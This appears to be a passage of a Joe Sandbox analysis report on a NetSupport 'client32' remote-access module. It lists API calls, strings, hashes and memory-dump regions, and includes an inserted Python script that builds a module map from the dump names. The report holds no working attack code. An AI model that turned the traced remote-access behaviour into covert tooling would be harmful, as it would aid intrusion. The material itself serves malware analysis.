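Running `triage(PSCR_INSTALL)` reports the runtime resolution of IsWow64Process with its ERROR_CALL_NOT_IMPLEMENTED fallback, a child process created with CREATE_DEFAULT_ERROR_MODE that the caller waits on, and the pscrinst.dll / winst64.exe / NS-PseudoSmartCardReader artefacts; `triage(BRIDGE_LOADER)` reports the br_open/br_close resolution, the tray icon, the shared error handler at 11027FB0 and the CLIENT32.CPP / ipbr32.dll / tcbr32.dll strings. Argument positions come straight from the report's display, so a `?` in a slot the rule inspects is handled as unrecovered rather than treated as a value.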
                                                        APIs
                                                          • Part of subcall function 110596B0: __itow.LIBCMT ref: 110596D5
                                                        • GetObjectA.GDI32(?,0000003C,?), ref: 11005415
                                                          • Part of subcall function 111028F0: _malloc.LIBCMT ref: 111028F9
                                                          • Part of subcall function 111028F0: _memset.LIBCMT ref: 11102922
                                                        • wsprintfA.USER32 ref: 1100546D
                                                        • DeleteObject.GDI32(?), ref: 110054C2
                                                        • DeleteObject.GDI32(?), ref: 110054CB
                                                        • SelectObject.GDI32(?,?), ref: 110054E2
                                                        • DeleteObject.GDI32(?), ref: 110054E8
                                                        • DeleteDC.GDI32(?), ref: 110054EE
                                                        • SelectObject.GDI32(?,?), ref: 110054FF
                                                        • DeleteObject.GDI32(?), ref: 11005508
                                                        • DeleteDC.GDI32(?), ref: 1100550E
                                                        • DeleteObject.GDI32(?), ref: 1100551F
                                                        • DeleteObject.GDI32(?), ref: 1100554A
                                                        • DeleteObject.GDI32(?), ref: 11005568
                                                        • DeleteObject.GDI32(?), ref: 11005571
                                                        • ShowWindow.USER32(?,00000009), ref: 1100559F
                                                        • PostQuitMessage.USER32(00000000), ref: 110055A7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                         • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Object$Delete$Select$MessagePostQuitShowWindow__itow_malloc_memsetwsprintf
                                                        • String ID: %d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s$Annotate$FillColour$FillStyle$Font$PenColour$PenStyle$PenWidth$Tool
                                                        • API String ID: 2789700732-770455996
                                                        • Opcode ID: bffa70751cd7c6e62ae0059442501a3dca6783ea3bd189fee305e70bee420e80
                                                        • Instruction ID: 9e125dedda538187a29fc8d034e3741b0da66b6e6d06abace117032ecdb9a76e
                                                        • Opcode Fuzzy Hash: bffa70751cd7c6e62ae0059442501a3dca6783ea3bd189fee305e70bee420e80
                                                        • Instruction Fuzzy Hash: C0813775A00615AFD765EBA5C890EEBF7F9AF8C304F00854CE69697241DA70F901CF60
                                                        APIs
                                                        • GetSysColor.USER32(00000004), ref: 110037BF
                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 110037DA
                                                        • GetSysColor.USER32(00000010), ref: 110037ED
                                                        • GetSysColor.USER32(00000010), ref: 11003804
                                                        • GetSysColor.USER32(00000014), ref: 1100381B
                                                        • GetSysColor.USER32(00000014), ref: 11003832
                                                        • GetSysColor.USER32(00000014), ref: 11003855
                                                        • GetSysColor.USER32(00000014), ref: 1100386C
                                                        • GetSysColor.USER32(00000010), ref: 11003883
                                                        • GetSysColor.USER32(00000010), ref: 1100389A
                                                        • GetSysColor.USER32(00000004), ref: 110038B1
                                                        • SetBkColor.GDI32(00000000,00000000), ref: 110038B8
                                                        • InflateRect.USER32(?,000000FE,000000FD), ref: 110038C6
                                                        • GetSysColor.USER32(00000010), ref: 110038E2
                                                        • CreatePen.GDI32(?,00000001,00000000), ref: 110038EB
                                                        • SelectObject.GDI32(00000000,00000000), ref: 110038F9
                                                        • MoveToEx.GDI32(00000000,?,?,00000000), ref: 11003912
                                                        • LineTo.GDI32(00000000,?,?), ref: 11003926
                                                        • SelectObject.GDI32(00000000,?), ref: 11003934
                                                        • DeleteObject.GDI32(?), ref: 1100393E
                                                        • GetSysColor.USER32(00000014), ref: 1100394C
                                                        • CreatePen.GDI32(?,00000001,00000000), ref: 11003955
                                                        • SelectObject.GDI32(00000000,00000000), ref: 11003962
                                                        • MoveToEx.GDI32(00000000,?,?,00000000), ref: 1100397E
                                                        • LineTo.GDI32(00000000,?,?), ref: 11003995
                                                        • SelectObject.GDI32(00000000,?), ref: 110039A3
                                                        • DeleteObject.GDI32(00000000), ref: 110039AA
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                         • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Color$Object$Select$CreateDeleteInflateLineMoveRect
                                                        • String ID:
                                                        • API String ID: 1903512896-0
                                                        • Opcode ID: f54cc67ce8688082e8d9bd7ceb245565d37858412d515c724044303615fa1441
                                                        • Instruction ID: 5d0285bcf9a9339dda167f9027b4ec7cc5a21a28eaa690855b6058ef89d625f1
                                                        • Opcode Fuzzy Hash: f54cc67ce8688082e8d9bd7ceb245565d37858412d515c724044303615fa1441
                                                        • Instruction Fuzzy Hash: D08151B5900209AFDB10DFA4CC85FBFF7B9EB88305F104A18F611E7285D670A945CBA1
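The "Memory Dump Source" entries above encode the dumped regions of the client32 module in their file names. The script below is an added example, not part of the Joe Sandbox report and not code from the sample. It assumes the field layout <pid>.<phase>.<dump id>.<base address>.<protection>.<type>.<?>.<?>.sdmp and that the protection field is a Windows PAGE_* value; both assumptions are cross-checked against the report's own "Offset: 11000000, based on PE: true" annotation and the hcaresult_11_2_11000000_client32.jbxd snapshot name, and the result is a module map (which regions are executable, which are writable, where the disassembled code came from). `DumpRegion`, `parse_dump_sources` and `module_map` are this example's own names.

```python
"""Rebuild the client32 module map from the "Memory Dump Source" entries of this report.
Added example, not Joe Sandbox code. Two assumptions are made here and cross-checked against
the report's own "Offset:" / "based on PE:" annotation and the hcaresult_*.jbxd snapshot name:
  1. an .sdmp name is <pid>.<phase>.<dump id>.<base address>.<protection>.<type>.<?>.<?>.sdmp
  2. the protection field holds a Windows PAGE_* value as defined in winnt.h
The sample entries are copied from this page, "Download File" link residue included,
so the parser has to tolerate trailing text."""
import re
from dataclasses import dataclass

SDMP = re.compile(r"(?P<pid>[0-9A-F]{8})\.(?P<phase>[0-9A-F]{8})\.\d+\.(?P<base>[0-9A-F]{16})\."
                  r"(?P<prot>[0-9A-F]{8})\.[0-9A-F]{8}\.[0-9A-F]{8}\.[0-9A-F]{8}\.sdmp")
OFFSET = re.compile(r"Offset:\s*(?P<base>[0-9A-F]+).*based on PE:\s*(?P<pe>true|false)")
SNAPSHOT = re.compile(r"hcaresult_(?P<pid>\d+)_(?P<phase>\d+)_(?P<base>[0-9A-Fa-f]+)_(?P<module>\w+)\.jbxd")
PAGE_PROTECTION = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                   0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                   0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}

@dataclass(frozen=True)
class DumpRegion:
    pid: int
    phase: int
    base: int
    protection: int
    is_source: bool   # the region the disassembly was taken from ("Source File")

    @property
    def protection_name(self):
        return PAGE_PROTECTION.get(self.protection & 0xFF, hex(self.protection))

    @property
    def executable(self):   # PAGE_EXECUTE* values all live in the high nibble
        return bool(self.protection & 0xF0)

    @property
    def writable(self):     # READWRITE, WRITECOPY and their EXECUTE_ variants
        return bool(self.protection & 0xCC)

def parse_dump_sources(text):
    regions = []
    for line in text.splitlines():
        m = SDMP.search(line)
        if m:
            regions.append(DumpRegion(int(m["pid"], 16), int(m["phase"], 16), int(m["base"], 16),
                                      int(m["prot"], 16), "Source File" in line))
    return sorted(regions, key=lambda r: r.base)

def module_map(text):
    """Summarise the regions and check them against the report's own annotations."""
    regions = parse_dump_sources(text)
    off, snap = OFFSET.search(text), SNAPSHOT.search(text)
    base = int(off["base"], 16) if off else None
    pids = sorted({r.pid for r in regions})
    return {
        "pids": pids,
        "base": base,
        "is_pe": bool(off) and off["pe"] == "true",
        "module": snap["module"] if snap else None,
        # the snapshot name encodes pid (decimal) and base (hex); both must agree with the dumps
        "consistent": bool(snap) and int(snap["pid"]) in pids and int(snap["base"], 16) == base
                      and any(r.base == base for r in regions),
        "executable": [r.base for r in regions if r.executable],
        "writable": [r.base for r in regions if r.writable],
        "source": [r.base for r in regions if r.is_source],
        "span": (regions[0].base, regions[-1].base) if regions else None,
    }

# Sample input copied from this report's "Memory Dump Source" block for client32.
SAMPLE = r"""
• Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
• Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
• Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
• Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
• Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
• Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
• Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
• Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
• Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
• Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
• Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
• Snapshot File: hcaresult_11_2_11000000_client32.jbxd
"""
```

`module_map(SAMPLE)` yields one executable region at 0x11001000 (the one the disassembly came from), two writable regions at 0x111CD000 and 0x111DC000, and a module spanning 0x11000000 to 0x11332000 in process 11, consistent with the snapshot name. If "consistent" comes back False on another report, one of the two assumptions in the docstring does not hold for that report and the map should not be trusted.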
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(Kernel32.dll,82E0FB89), ref: 110B728D
                                                        • GetProcAddress.KERNEL32(00000000,SetThreadExecutionState), ref: 110B72DA
                                                        • SetLastError.KERNEL32(00000078), ref: 110B72F5
                                                        • SystemParametersInfoA.USER32(00000010,00000000,?,00000000), ref: 110B730C
                                                        • SystemParametersInfoA.USER32(00000011,00000000,00000000,00000000), ref: 110B7318
                                                        • OleInitialize.OLE32(00000000), ref: 110B7354
                                                        • LoadAcceleratorsA.USER32(00000000,00003330), ref: 110B741C
                                                        • UpdateWindow.USER32(?), ref: 110B7486
                                                        • OleUninitialize.OLE32 ref: 110B7507
                                                        • GetProcAddress.KERNEL32(?,SetThreadExecutionState), ref: 110B751B
                                                        • SetLastError.KERNEL32(00000078), ref: 110B7533
                                                        • SystemParametersInfoA.USER32(00000011,00000001,00000000,00000000), ref: 110B7544
                                                        • FreeLibrary.KERNEL32(?,?), ref: 110B7572
                                                          • Part of subcall function 110B0B60: GetWindowPlacement.USER32(?,0000002C,75A37AA0), ref: 110B0B9F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: InfoParametersSystem$AddressErrorLastLibraryLoadProcWindow$AcceleratorsFreeInitializePlacementUninitializeUpdate
                                                        • String ID: ..\CTL32\NSMCobrowse.cpp$1601$FALSE$Kernel32.dll$NSMCobrowse$SetThreadExecutionState$Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1$Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3$e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                        • API String ID: 3244972839-2715558161
                                                        • Opcode ID: f1869e9ace16bcabbdf441272b9f7ccf41929b43d66111c24cabc24926d86a2b
                                                        • Instruction ID: f8ce5fb705e420c25b78c7aa5baaf6ec852ae9732c421639fd8232ddcd28cd9c
                                                        • Opcode Fuzzy Hash: f1869e9ace16bcabbdf441272b9f7ccf41929b43d66111c24cabc24926d86a2b
                                                        • Instruction Fuzzy Hash: 8C91A0B9E00659AFDB01DFA5CCC0AAEFBF4BF08308F54492DE515A7281DB306941CBA5
                                                        APIs
                                                          • Part of subcall function 11134770: _memset.LIBCMT ref: 111347B5
                                                          • Part of subcall function 11134770: GetVersionExA.KERNEL32(?,00000000,00000000), ref: 111347CE
                                                          • Part of subcall function 11134770: LoadLibraryA.KERNEL32(kernel32.dll), ref: 111347F5
                                                          • Part of subcall function 11134770: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 11134807
                                                          • Part of subcall function 11134770: FreeLibrary.KERNEL32(00000000), ref: 1113481F
                                                          • Part of subcall function 11134770: GetSystemDefaultLangID.KERNEL32 ref: 1113482A
                                                        • LoadMenuA.USER32(00000000,000032E2), ref: 110B11C0
                                                        • CreateWindowExA.USER32(00000000,NSMCobrMain,?,04CF0000,80000000,80000000,00000190,000001F4,00000000,00000000,?,00000000), ref: 110B11F5
                                                        • SetWindowPlacement.USER32(?,0000002C,00000000,?,?,00000000), ref: 110B1299
                                                        • GetMenu.USER32(?), ref: 110B12E3
                                                        • DeleteMenu.USER32(00000000,00000004,00000400,?,?,00000000), ref: 110B12ED
                                                        • GetWindowPlacement.USER32(?,0000002C,?,?,00000000), ref: 110B132E
                                                        • GetMenu.USER32(?), ref: 110B1380
                                                        • GetMenuItemCount.USER32(00000000), ref: 110B138A
                                                        • DeleteMenu.USER32(00000000,-00000001,?,?,00000000), ref: 110B1393
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        • UpdateWindow.USER32(?), ref: 110B13D5
                                                        • BringWindowToTop.USER32(?), ref: 110B13DF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Menu$Window$DeleteLibraryLoadPlacement$AddressBringCountCreateDefaultErrorExitFreeItemLangLastMessageProcProcessSystemUpdateVersion_memsetwsprintf
                                                        • String ID: *StartPage$*WindowPos$,$..\CTL32\NSMCobrowse.cpp$IsA()$NSMCobrMain$about:blank$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h$e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                        • API String ID: 2603857032-544735205
                                                        • Opcode ID: 6ce295a978d4c0f578fdcd161a0048bff9384069b6bc0b2638a1909efe396e8a
                                                        • Instruction ID: 0b238a22b308422866b6e53ee66487a0a9e71651472ee473fa52922344df5796
                                                        • Opcode Fuzzy Hash: 6ce295a978d4c0f578fdcd161a0048bff9384069b6bc0b2638a1909efe396e8a
                                                        • Instruction Fuzzy Hash: D791B078B00706AFD721DF61DC80FDAF3B5AF48708F008998E6569B685EB70B944CB95
                                                        APIs
                                                        • GetUserObjectSecurity.USER32(?,?,00000000,00000000,?), ref: 11085218
                                                        • GetProcessHeap.KERNEL32(00000008,?), ref: 1108522A
                                                        • HeapAlloc.KERNEL32(00000000), ref: 11085231
                                                        • GetUserObjectSecurity.USER32(?,00000004,110855CC,?,?), ref: 11085247
                                                        • GetUserObjectSecurity.USER32(00000001,00000004,00000000,00000001,00000001), ref: 11085265
                                                        • GetProcessHeap.KERNEL32(00000008,00000001), ref: 11085271
                                                        • HeapAlloc.KERNEL32(00000000), ref: 11085278
                                                        • GetUserObjectSecurity.USER32(00000001,00000004,?,00000001,00000001), ref: 1108528E
                                                        • GetSecurityDescriptorDacl.ADVAPI32(110855CC,00000000,?,?), ref: 110852B0
                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,00000000,?,?), ref: 110852C9
                                                        • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 1108533F
                                                        • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 11085357
                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,?), ref: 11085379
                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,?), ref: 11085395
                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 110853B5
                                                        • SetUserObjectSecurity.USER32(00000001,00000004,?), ref: 110853CF
                                                        • GetProcessHeap.KERNEL32(00000000,110855CC), ref: 110853E9
                                                        • HeapFree.KERNEL32(00000000), ref: 110853EC
                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 110853F8
                                                        • HeapFree.KERNEL32(00000000), ref: 110853FB
                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 11085407
                                                        • HeapFree.KERNEL32(00000000), ref: 1108540A
                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 11085416
                                                        • HeapFree.KERNEL32(00000000), ref: 11085419
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: HeapSecurity$DescriptorObjectProcessUser$DaclFree$AllocInitialize
                                                        • String ID:
                                                        • API String ID: 3868453208-0
                                                        • Opcode ID: a825820c58583e875331af90eeb360339016fbb48d06a2a4b775561e61e6bd06
                                                        • Instruction ID: 017101d2f13020300e76833adeebb0b818ce4fdc5b6587dcfb92681743389174
                                                        • Opcode Fuzzy Hash: a825820c58583e875331af90eeb360339016fbb48d06a2a4b775561e61e6bd06
                                                        • Instruction Fuzzy Hash: 30810BB2D04219AFEB11DBD8CC90FEFB7BCEF48714F118559E900A7244D6B5AE458BA0
                                                        APIs
                                                        • GetTickCount.KERNEL32 ref: 1104D6D7
                                                        • _malloc.LIBCMT ref: 1104D960
                                                          • Part of subcall function 111515D1: __FF_MSGBANNER.LIBCMT ref: 111515EA
                                                          • Part of subcall function 111515D1: __NMSG_WRITE.LIBCMT ref: 111515F1
                                                          • Part of subcall function 111515D1: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,111028FE,?,?,?,?,111343F2,?,?,?), ref: 11151616
                                                        • _memmove.LIBCMT ref: 1104D983
                                                        • SendMessageTimeoutA.USER32(?,0000004A,0001042A,?,00000002,00002710,00000000), ref: 1104D9EA
                                                        • _free.LIBCMT ref: 1104D6F5
                                                          • Part of subcall function 11151665: HeapFree.KERNEL32(00000000,00000000,?,1115A186,00000000,?,111028FE,?,?,?,?,111343F2,?,?,?), ref: 1115167B
                                                          • Part of subcall function 11151665: GetLastError.KERNEL32(00000000,?,1115A186,00000000,?,111028FE,?,?,?,?,111343F2,?,?,?), ref: 1115168D
                                                          • Part of subcall function 11037950: GetDateFormatA.KERNEL32(00000400,00000002,00000000,00000000,?,00000020,82E0FB89,?,?,00000000,?,00000000,1116DED1,000000FF,?,1104DB2D), ref: 1103798F
                                                          • Part of subcall function 11037950: GetTimeFormatA.KERNEL32(00000400,00000002,00000000,00000000,?,00000010,?,1104DB2D,?,?,000003EF,00000000), ref: 110379A4
                                                        • _malloc.LIBCMT ref: 1104D716
                                                        • _memmove.LIBCMT ref: 1104D726
                                                        • GetTickCount.KERNEL32 ref: 1104D72E
                                                        • IsWindow.USER32(?), ref: 1104D81E
                                                        • _free.LIBCMT ref: 1104D9F1
                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,000003EF,00000000,?,?,?,?,?,?), ref: 1104DB3F
                                                          • Part of subcall function 110C5870: _free.LIBCMT ref: 110C589D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _free$CountFormatHeapTick_malloc_memmove$AllocateDateErrorFileFreeLastMessageModuleNameSendTimeTimeoutWindow
                                                        • String ID: Client$DisableMessage$IsA()$Result of SendMessage %d$Send Message to StudentUI$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h$pcicl32.dll$toastImageAndText.png$toastMessage.png
                                                        • API String ID: 1763481038-1556842855
                                                        • Opcode ID: d71bba76b178c5dc766708e327a9ff06053e3c4114c2f30c4ebe94e99cfb6490
                                                        • Instruction ID: dd68662fa2b7b78e02f42c071c2c91de2c128a2af9df8d519f107d9f1f1afb16
                                                        • Opcode Fuzzy Hash: d71bba76b178c5dc766708e327a9ff06053e3c4114c2f30c4ebe94e99cfb6490
                                                        • Instruction Fuzzy Hash: 48029D74E0521A9FDB15DB64CDD8FDEB7B4AF58308F1081E8D80A97281EB70AA44CF61
                                                        APIs
                                                          • Part of subcall function 110E2140: RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?,00000000,00000001,00000000,?,1102EA96,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110E215C
                                                          • Part of subcall function 110C4D10: _malloc.LIBCMT ref: 110C4D2A
                                                          • Part of subcall function 110E1DB0: RegEnumKeyExA.ADVAPI32(?,?,?,00000200,00000000,00000000,00000000,00000000,?,00000000), ref: 110E1DFB
                                                        • wsprintfA.USER32 ref: 11029ABD
                                                          • Part of subcall function 110E2510: RegQueryInfoKeyA.ADVAPI32(0002001F,?,?,0002001F,?,?,0002001F,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,11029895), ref: 110E2546
                                                        • FileTimeToSystemTime.KERNEL32(0002001F,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 110298CA
                                                        • wsprintfA.USER32 ref: 1102990E
                                                        • wsprintfA.USER32 ref: 11029975
                                                          • Part of subcall function 110E2B90: wsprintfA.USER32 ref: 110E2BF4
